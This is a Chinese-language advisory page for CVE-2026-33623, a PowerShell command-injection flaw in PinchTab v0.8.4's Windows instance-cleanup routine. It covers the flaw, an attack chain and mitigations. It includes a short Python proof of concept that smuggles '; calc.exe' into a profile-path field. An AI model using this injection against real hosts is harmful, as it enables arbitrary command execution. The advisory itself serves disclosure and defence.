CVE-2026-33623 CVSS 6.7 中危

CVE-2026-33623 PinchTab Windows命令注入漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33623

漏洞类型

命令注入

CVSS评分

6.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PinchTab

漏洞概述

PinchTab v0.8.4 在 Windows 系统的清理路径中存在命令注入漏洞。当停止实例时，系统构建 PowerShell 命令字符串，虽转义了反斜杠但未安全过滤其他特殊字符。拥有高权限 API 访问权限的攻击者可通过精心构造的配置文件名称并触发清理，在主机上执行任意 PowerShell 命令，继承进程用户权限。

技术细节

该漏洞源于 PinchTab 在 Windows 平台上处理孤儿 Chrome 进程清理时的逻辑缺陷。当实例停止时，程序会根据配置文件路径构建一个 PowerShell `-Command` 字符串以执行清理任务。在 v0.8.4 版本中，代码仅对反斜杠进行了转义处理，却忽略了如分号、反引号、美元符号等其他 PowerShell 元字符。攻击者若具备受信的高权限 API 访问权限，可以创建一个包含恶意 PowerShell 代码的配置文件名称。当攻击者调用停止实例接口触发清理流程时，这个未经过滤的字符串被拼接到 PowerShell 命令中执行，从而导致命令注入。攻击者无需绕过主机权限边界，即可在 PinchTab 进程用户的上下文中执行任意系统命令。

攻击链分析

STEP 1

1. 获取权限

攻击者获取对 PinchTab API 的高权限访问权限。

STEP 2

2. 创建恶意实例

攻击者调用 API 启动实例，并在配置文件路径参数中注入包含特殊元字符的恶意 Payload。

STEP 3

3. 触发清理流程

攻击者调用停止实例的 API 接口。

STEP 4

4. 命令拼接与执行

服务器端清理例程构建 PowerShell 命令，由于过滤不严，恶意 Payload 被执行，导致攻击者在主机上运行任意命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-33623
# Requires authenticated high-privilege API access
import requests

target_url = "http://vulnerable-host:port"

# Malicious profile path containing PowerShell injection payload
# The cleanup logic escapes backslashes but not other metacharacters.
# Payload: `; calc.exe #
malicious_profile = "C:\\Users\\victim\\profile`"; calc.exe #"

# 1. Launch instance with crafted profile (Admin access required)
create_data = {"profile_path": malicious_profile}
# requests.post(f"{target_url}/api/instances/start", json=create_data)

# 2. Trigger the cleanup path by stopping the instance
# This causes the server to execute: powershell -Command ... "C:\Users\victim\profile`"; calc.exe #" ...
# requests.post(f"{target_url}/api/instances/stop")

print("[+] Triggering cleanup with malicious profile path.")
print("[+] If vulnerable, calc.exe will execute on the host.")

影响范围

PinchTab 0.8.4

防御指南

临时缓解措施

如果无法立即升级，请严格限制对 PinchTab API 端点的网络访问，确保只有受信任的管理员账户可以调用实例启动和停止接口。同时，监控系统中异常的 PowerShell 进程启动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表